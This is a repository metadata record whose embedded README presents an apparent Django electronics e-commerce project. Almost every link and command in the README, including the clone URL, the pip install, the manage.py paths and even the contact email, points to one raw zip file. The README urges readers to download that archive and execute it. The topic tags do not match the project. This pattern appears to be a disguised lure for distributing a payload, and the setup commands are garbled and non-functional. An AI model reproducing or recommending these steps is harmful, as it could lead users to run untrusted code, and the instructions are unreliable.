{"id":28332729,"url":"https://github.com/vinit77-op/electronics-store","last_synced_at":"2026-04-14T03:32:56.889Z","repository":{"id":294784560,"uuid":"988030768","full_name":"vinit77-op/electronics-store","owner":"vinit77-op","description":"Modern Django-based e-commerce site for electronics store","archived":false,"fork":false,"pushed_at":"2026-02-21T21:55:06.000Z","size":2009,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2026-02-22T01:23:49.662Z","etag":null,"topics":["data-science","dependency-injection","entity-framework-core","java","javafx","livecharts","material-ui","matplotlib","mvvm-architecture","pandas","prism","quotes","reducer","repository-pattern","stripe-payments","wpf","wpf-application","wpfui"],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vinit77-op.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-05-22T00:34:43.000Z","updated_at":"2026-02-21T21:55:10.000Z","dependencies_parsed_at":null,"dependency_job_id":"91d02730-0df5-47ef-9726-a155fe33bdf9","html_url":"https://github.com/vinit77-op/electronics-store","commit_stats":null,"previous_names":["vinit77-op/electronics-store"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/vinit77-op/electronics-store","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vinit77-op%2Felectronics-store","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vinit77-op%2Felectronics-store/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vinit77-op%2Felectronics-store/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vinit77-op%2Felectronics-store/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vinit77-op","download_url":"https://codeload.github.com/vinit77-op/electronics-store/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vinit77-op%2Felectronics-store/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31781292,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-14T02:24:21.117Z","status":"ssl_error","status_checked_at":"2026-04-14T02:24:20.627Z","response_time":153,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["data-science","dependency-injection","entity-framework-core","java","javafx","livecharts","material-ui","matplotlib","mvvm-architecture","pandas","prism","quotes","reducer","repository-pattern","stripe-payments","wpf","wpf-application","wpfui"],"created_at":"2025-05-26T20:21:40.270Z","updated_at":"2026-04-14T03:32:56.874Z","avatar_url":"https://github.com/vinit77-op.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 📦 Electronics Store - A Modern E-Commerce Platform\n\nWelcome to the **Electronics Store** repository! This project is a modern e-commerce site built with Django, designed to provide a seamless shopping experience for electronics. Whether you're looking for the latest gadgets or everyday tech essentials, this platform aims to meet your needs efficiently.\n\n[![Download Releases](https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip%20Releases-blue?style=for-the-badge\u0026logo=github)](https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip)\n\n## Table of Contents\n\n- [Features](#features)\n- [Technologies Used](#technologies-used)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n\n## Features\n\n- **User-Friendly Interface**: The site offers a clean and intuitive design, making it easy for users to browse and purchase products.\n- **Product Management**: Admins can easily add, edit, and remove products from the store.\n- **Shopping Cart**: Users can add items to their cart and proceed to checkout with ease.\n- **Secure Payment Processing**: The platform supports secure payment gateways to ensure safe transactions.\n- **Responsive Design**: The site is mobile-friendly, providing a great experience on any device.\n- **Search Functionality**: Users can quickly find products using the search feature.\n- **Order Tracking**: Customers can track their orders in real-time.\n\n## Technologies Used\n\nThis project utilizes a range of technologies to create a robust e-commerce platform:\n\n- **Django**: The primary framework used for building the application.\n- **Python**: The programming language that powers the backend.\n- **HTML/CSS**: For structuring and styling the frontend.\n- **JavaScript**: To enhance interactivity on the site.\n- **PostgreSQL**: The database used for storing product and user information.\n- **Bootstrap**: A CSS framework that aids in responsive design.\n\n## Installation\n\nTo get started with the Electronics Store project, follow these steps:\n\n1. **Clone the Repository**:\n   ```bash\n   git clone https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip\n   cd electronics-store\n   ```\n\n2. **Set Up a Virtual Environment**:\n   ```bash\n   python -m venv venv\n   source venv/bin/activate  # On Windows use `venv\\Scripts\\activate`\n   ```\n\n3. **Install Dependencies**:\n   ```bash\n   pip install -r https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip\n   ```\n\n4. **Set Up the Database**:\n   Update your database settings in `https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip` and run:\n   ```bash\n   python https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip migrate\n   ```\n\n5. **Create a Superuser**:\n   ```bash\n   python https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip createsuperuser\n   ```\n\n6. **Run the Development Server**:\n   ```bash\n   python https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip runserver\n   ```\n\n7. **Visit the Site**: Open your browser and go to `http://127.0.0.1:8000`.\n\nYou can download the latest release and execute it from [here](https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip).\n\n## Usage\n\nOnce the application is running, you can explore the following features:\n\n- **Browse Products**: View the available electronics by navigating through categories.\n- **Add to Cart**: Click on the \"Add to Cart\" button on product pages to add items.\n- **Checkout**: Review your cart and proceed to checkout for payment.\n- **Admin Panel**: Access the admin panel at `http://127.0.0.1:8000/admin` to manage products and orders.\n\n## Contributing\n\nWe welcome contributions to improve the Electronics Store project. Here’s how you can help:\n\n1. **Fork the Repository**: Click the \"Fork\" button at the top right of this page.\n2. **Create a Branch**: Create a new branch for your feature or bug fix.\n   ```bash\n   git checkout -b feature/YourFeature\n   ```\n3. **Make Changes**: Implement your changes and commit them.\n   ```bash\n   git commit -m \"Add your message here\"\n   ```\n4. **Push Changes**: Push your changes to your forked repository.\n   ```bash\n   git push origin feature/YourFeature\n   ```\n5. **Open a Pull Request**: Go to the original repository and click on \"New Pull Request\".\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Contact\n\nFor any questions or feedback, please reach out to the project maintainer:\n\n- **Name**: Vinit\n- **Email**: https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip\n- **GitHub**: [vinit77-op](https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip)\n\nFeel free to check the [Releases](https://raw.githubusercontent.com/vinit77-op/electronics-store/master/store/store_electronics_v2.4.zip) section for updates and new features. \n\n---\n\nThank you for checking out the Electronics Store project! We hope you find it useful and easy to use. Your feedback is always appreciated.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvinit77-op%2Felectronics-store","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvinit77-op%2Felectronics-store","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvinit77-op%2Felectronics-store/lists"}